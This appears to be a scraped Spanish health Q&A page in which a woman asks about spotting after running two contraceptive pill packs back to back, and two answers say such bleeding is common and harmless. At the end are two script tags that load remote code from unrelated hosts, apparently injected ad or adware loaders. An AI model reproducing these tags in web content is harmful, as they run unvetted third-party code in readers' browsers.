Aparición de regla en medio de un blister

Buenos días.
Mi problema es el siguiente, mi anterior regla me
tenía que haber venido entre el 6 y el 10 de octubre, pero como me iba
de viaje, me tome el segundo blíster para no tener la regla esos días, retrasándola.
En teoría la siguiente regla, me tendría que haber venido a final de
mes. Pero llevo unos días manchando, no tanto como el periodo pero casi.
¿Esto es normal? ¿Que puedo hacer?

Respuesta

Sí, cuando se modifican los ciclos, uno de los inconvenientes es que puede haber pérdidas intermenstruales. No te preocupes, continúa con normalidad. Sólo si las pérdidas se alargan o resultan muy molestas por su cantidad deberías acudir al ginecólogo.

1 respuesta más de otro experto

Respuesta

Entiendo que has empezado el segundo blister sin hacer descanso y que vas a tomarlo entero por lo que la regla te bajará en la semana de descanso de ese segundo blister.

Lo que te pasa es normal cuando se hace esto, no siempre ocurre pero se pueden tener un pequeño sangrado intermenstrual. Puede ser un incordio pero es normal, no significa que no haga efecto. Sigue como hasta ahora, no hay porque modificar nada.

Gracias!!

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>